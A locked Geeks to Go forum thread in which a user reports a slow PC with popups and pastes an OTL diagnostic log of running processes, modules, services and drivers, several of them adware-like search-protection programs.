Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

System is very slow [Closed]


  • This topic is locked This topic is locked

#1
peejaygee

peejaygee

    Member

  • Member
  • PipPip
  • 39 posts

My computer is extremely slow and I am getting lots of popups.

 

 

OTL logfile created on: 02/06/2014 13:53:05 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\paulj_000\Downloads
64bit- An unknown product  (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17031)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.90 Gb Total Physical Memory | 2.88 Gb Available Physical Memory | 73.96% Memory free
4.59 Gb Paging File | 3.48 Gb Available in Paging File | 75.89% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 914.79 Gb Total Space | 851.27 Gb Free Space | 93.06% Space Free | Partition Type: NTFS
Drive D: | 15.94 Gb Total Space | 1.58 Gb Free Space | 9.90% Space Free | Partition Type: NTFS
 
Computer Name: PC | User Name: paulj_000 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2014/06/02 10:41:25 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\paulj_000\Downloads\OTL.exe
PRC - [2014/05/24 16:58:25 | 003,888,648 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\avastui.exe
PRC - [2014/05/23 08:31:06 | 004,879,680 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\SearchProtect\bin\cltmng.exe
PRC - [2014/05/23 08:31:06 | 003,080,000 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\UI\bin\cltmngui.exe
PRC - [2014/05/23 08:31:06 | 002,497,856 | ---- | M] (Client Connect LTD) -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
PRC - [2014/05/21 16:30:50 | 000,846,696 | ---- | M] (Spigot, Inc.) -- C:\Users\paulj_000\AppData\Roaming\Search Protection\SearchProtection.exe
PRC - [2014/05/04 16:53:59 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2013/10/15 14:41:34 | 001,584,856 | ---- | M] (Hewlett-Packard) -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe
PRC - [2013/10/08 12:41:36 | 001,045,304 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
PRC - [2013/10/08 12:41:28 | 001,039,160 | ---- | M] (Hewlett-Packard Development Company, L.P.) -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
PRC - [2013/09/05 06:44:18 | 000,298,760 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
PRC - [2013/09/05 06:44:16 | 000,077,576 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
PRC - [2013/09/02 03:18:24 | 000,267,224 | ---- | M] (CyberLink Corp.) -- C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
PRC - [2013/08/05 08:49:42 | 000,111,576 | ---- | M] (CyberLink) -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
PRC - [2013/05/14 19:18:02 | 000,235,072 | ---- | M] (Internet Helper) -- C:\ProgramData\Internet Helper Anti-phishing\internetHelper_antiphishing.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/05/20 18:20:13 | 000,080,696 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework\7.0.0.1__d4a591153760ff28\HP.SupportFramework.dll
MOD - [2014/05/20 18:20:13 | 000,031,032 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework.ServiceManager\7.0.0.1__afd7346f05a57c11\HP.SupportFramework.ServiceManager.dll
MOD - [2014/05/20 18:20:11 | 000,073,528 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\HP.SupportFramework.Common\7.0.0.1__41bdec5abf54f6dc\HP.SupportFramework.Common.dll
MOD - [2014/05/18 21:40:10 | 001,711,104 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\3bae4f8d09b11e0d9dc901df5effbf08\Microsoft.VisualBasic.ni.dll
MOD - [2014/05/11 19:49:46 | 000,220,672 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\a7db022b87017cc62542ef85d19c7fb1\CustomMarshalers.ni.dll
MOD - [2014/05/11 19:49:33 | 000,978,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\97272e5adde36ea896d7216bf0270e15\System.Configuration.ni.dll
MOD - [2014/05/11 19:48:29 | 005,463,552 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\672138dc2f47a077f59ef14290a6973e\System.Xml.ni.dll
MOD - [2014/05/11 19:48:19 | 012,436,480 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\a673aacf407b499981342bb709cce917\System.Windows.Forms.ni.dll
MOD - [2014/05/11 19:48:03 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\d76ae95d56d39a59f727f5518ac8e396\System.Drawing.ni.dll
MOD - [2014/05/11 19:47:44 | 014,344,192 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\495d89631724cf0e7b1ace2c1edb4fa9\PresentationFramework.ni.dll
MOD - [2014/05/11 19:47:04 | 012,239,872 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\7eb357737121e026292287e3f53aae21\PresentationCore.ni.dll
MOD - [2014/05/11 19:46:30 | 003,349,504 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\3dce9bc573ada6f51434af3d3460a746\WindowsBase.ni.dll
MOD - [2014/05/11 19:46:21 | 007,993,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\20af51394609c937507288c2b1cf2c8c\System.ni.dll
MOD - [2014/05/11 19:46:06 | 011,499,520 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\3de119146ed0e59408f896aa69cdfc42\mscorlib.ni.dll
MOD - [2014/05/04 16:54:11 | 019,336,120 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll
MOD - [2013/08/23 11:29:26 | 000,069,120 | ---- | M] () -- C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll
MOD - [2013/08/05 16:48:08 | 000,016,856 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
MOD - [2013/08/05 08:49:47 | 000,627,672 | ---- | M] () -- C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/05/04 16:53:59 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV:64bit: - [2014/04/27 16:23:08 | 005,100,384 | ---- | M] (Reimage®) [Auto | Running] -- C:\Program Files\Reimage\Reimage Repair\ReiGuard.exe -- (ReimageRealTimeProtection)
SRV:64bit: - [2014/03/24 03:31:14 | 000,347,880 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:64bit: - [2014/03/24 03:31:14 | 000,023,824 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:64bit: - [2014/03/08 06:41:25 | 001,306,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:64bit: - [2014/03/06 08:02:13 | 000,834,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:64bit: - [2014/03/06 07:34:46 | 000,201,216 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:64bit: - [2014/02/22 16:53:10 | 003,394,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:64bit: - [2014/02/22 10:57:16 | 000,710,656 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:64bit: - [2014/02/22 10:26:58 | 000,366,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:64bit: - [2014/02/22 10:25:39 | 000,399,872 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:64bit: - [2014/02/22 10:25:14 | 000,269,824 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:64bit: - [2014/02/22 10:23:58 | 001,576,960 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:64bit: - [2014/01/27 16:38:59 | 001,584,128 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:64bit: - [2013/12/10 08:35:18 | 000,530,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:64bit: - [2013/11/23 05:50:00 | 000,282,112 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:64bit: - [2013/11/13 01:54:55 | 000,491,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:64bit: - [2013/10/19 06:37:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2013/10/14 12:29:40 | 000,087,552 | ---- | M] (Softex Inc.) [Auto | Running] -- C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe -- (omniserv)
SRV:64bit: - [2013/10/14 12:23:20 | 000,109,568 | ---- | M] () [Auto | Running] -- C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe -- (Cachedrv server)
SRV:64bit: - [2013/08/26 07:13:24 | 000,076,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV:64bit: - [2013/08/23 07:47:14 | 000,289,496 | ---- | M] (Realtek Semiconductor) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE -- (RtkAudioService)
SRV:64bit: - [2013/08/22 13:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:64bit: - [2013/08/22 12:32:02 | 000,024,576 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:64bit: - [2013/08/22 12:31:43 | 000,040,448 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:64bit: - [2013/08/22 12:22:45 | 000,066,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:64bit: - [2013/08/22 12:21:15 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:64bit: - [2013/08/22 12:16:57 | 000,118,272 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:64bit: - [2013/08/22 11:25:28 | 000,164,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:64bit: - [2013/08/22 11:19:28 | 000,517,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:64bit: - [2013/08/22 11:02:47 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:64bit: - [2013/08/22 10:57:25 | 000,130,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:64bit: - [2013/08/22 10:54:59 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:64bit: - [2013/08/22 10:50:59 | 000,245,760 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:64bit: - [2013/08/22 10:50:00 | 000,525,312 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:64bit: - [2013/08/22 10:45:59 | 000,151,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:64bit: - [2013/08/22 10:40:49 | 000,248,832 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:64bit: - [2013/08/22 10:31:03 | 000,201,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:64bit: - [2013/08/22 10:15:54 | 000,073,728 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:64bit: - [2013/07/01 21:08:48 | 000,822,232 | ---- | M] (Intel® Corporation) [On_Demand | Stopped] -- C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe -- (Intel®
SRV:64bit: - [2013/07/01 21:08:32 | 000,733,696 | ---- | M] (Intel® Corporation) [Auto | Running] -- C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe -- (Intel®
SRV:64bit: - [2009/11/17 12:14:26 | 000,098,208 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe -- (AERTFilters)
SRV - [2014/05/23 08:31:06 | 002,497,856 | ---- | M] (Client Connect LTD) [Auto | Running] -- C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe -- (CltMngSvc)
SRV - [2014/05/13 21:23:46 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/05/07 03:27:01 | 000,119,408 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/03/14 15:17:00 | 000,036,392 | ---- | M] (Just Develop It) [Auto | Running] -- C:\Program Files (x86)\MyPC Backup\BackupStack.exe -- (BackupStack)
SRV - [2013/11/13 01:54:53 | 000,357,376 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2013/11/04 18:31:56 | 000,092,160 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe -- (HP Support Assistant Service)
SRV - [2013/10/25 20:49:14 | 000,279,024 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2013/10/08 12:41:28 | 001,039,160 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Auto | Running] -- C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe -- (HPWMISVC)
SRV - [2013/09/05 06:44:18 | 000,298,760 | ---- | M] (CyberLink) [Auto | Running] -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe -- (CyberLink PowerDVD 12 Media Server Service)
SRV - [2013/09/05 06:44:16 | 000,077,576 | ---- | M] (CyberLink) [Auto | Running] -- C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe -- (CyberLink PowerDVD 12 Media Server Monitor Service)
SRV - [2013/08/26 07:13:24 | 000,475,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\iisw3adm.dll -- (WAS)
SRV - [2013/08/26 07:13:24 | 000,066,560 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\inetsrv\w3logsvc.dll -- (w3logsvc)
SRV - [2013/08/26 07:13:24 | 000,062,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\inetsrv\apphostsvc.dll -- (AppHostSvc)
SRV - [2013/08/22 13:31:56 | 002,899,968 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2013/08/22 04:55:35 | 000,018,944 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2013/08/22 03:53:34 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2013/08/07 02:34:24 | 000,312,448 | ---- | M] (Windows ® Win 7 DDK provider) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
SRV - [2012/04/24 15:37:56 | 000,169,752 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe -- (ICCS)
SRV - [2010/10/12 18:59:12 | 000,206,072 | ---- | M] (WildTangent, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe -- (GamesAppService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/05/19 16:58:07 | 001,039,096 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsnx.sys -- (aswSnx)
DRV:64bit: - [2014/05/19 16:58:06 | 000,423,240 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\SysNative\drivers\aswsp.sys -- (aswSP)
DRV:64bit: - [2014/05/19 16:58:06 | 000,085,328 | ---- | M] (AVAST Software) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\aswstm.sys -- (aswStm)
DRV:64bit: - [2014/05/04 16:54:22 | 000,208,416 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswVmm.sys -- (aswVmm)
DRV:64bit: - [2014/05/04 16:54:22 | 000,079,184 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\aswMonFlt.sys -- (aswMonFlt)
DRV:64bit: - [2014/05/04 16:54:22 | 000,065,776 | ---- | M] () [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\aswRvrt.sys -- (aswRvrt)
DRV:64bit: - [2014/05/04 16:54:22 | 000,029,208 | ---- | M] () [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\aswHwid.sys -- (aswHwid)
DRV:64bit: - [2014/05/04 16:54:20 | 000,093,568 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\aswRdr2.sys -- (aswRdr)
DRV:64bit: - [2014/03/24 03:30:57 | 000,257,880 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:64bit: - [2014/03/24 03:30:57 | 000,123,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:64bit: - [2014/03/24 03:27:03 | 000,035,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:64bit: - [2014/03/20 04:41:20 | 000,376,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:64bit: - [2014/03/13 13:35:24 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\wof.sys -- (Wof)
DRV:64bit: - [2014/03/08 21:40:16 | 000,136,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:64bit: - [2014/03/08 21:35:45 | 000,467,800 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:64bit: - [2014/02/22 17:00:25 | 000,236,888 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:64bit: - [2014/02/22 16:50:31 | 000,054,816 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:64bit: - [2014/02/22 16:49:51 | 000,325,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:64bit: - [2014/02/22 16:49:49 | 000,384,856 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:64bit: - [2014/02/22 16:49:49 | 000,189,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:64bit: - [2014/02/22 16:49:49 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:64bit: - [2014/02/22 16:49:47 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:64bit: - [2014/02/22 16:44:13 | 000,924,504 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\refs.sys -- (ReFS)
DRV:64bit: - [2014/02/22 13:14:02 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:64bit: - [2013/12/04 19:41:54 | 000,226,304 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthLEEnum.sys -- (BthLEEnum)
DRV:64bit: - [2013/11/13 01:54:52 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:64bit: - [2013/11/11 03:48:41 | 000,039,768 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:64bit: - [2013/11/01 12:39:53 | 000,086,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:64bit: - [2013/10/26 02:54:32 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:64bit: - [2013/10/25 20:49:08 | 004,177,920 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2013/10/25 20:49:02 | 000,449,528 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2013/10/05 16:25:54 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:64bit: - [2013/09/20 06:10:18 | 000,533,232 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\SynTP.sys -- (SynTP)
DRV:64bit: - [2013/09/20 06:10:18 | 000,034,544 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Smb_driver_Intel.sys -- (SmbDrvI)
DRV:64bit: - [2013/09/20 06:10:18 | 000,030,448 | ---- | M] (Synaptics Incorporated) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Smb_driver_AMDASF.sys -- (SmbDrv)
DRV:64bit: - [2013/08/26 23:54:36 | 000,263,896 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2013/08/23 02:11:12 | 003,860,480 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athwbx.sys -- (athr)
DRV:64bit: - [2013/08/22 23:51:12 | 000,039,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:64bit: - [2013/08/22 23:51:12 | 000,026,008 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:64bit: - [2013/08/22 20:12:11 | 000,027,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2013/08/22 20:12:07 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:64bit: - [2013/08/22 14:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:64bit: - [2013/08/22 14:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2013/08/22 13:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:64bit: - [2013/08/22 13:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
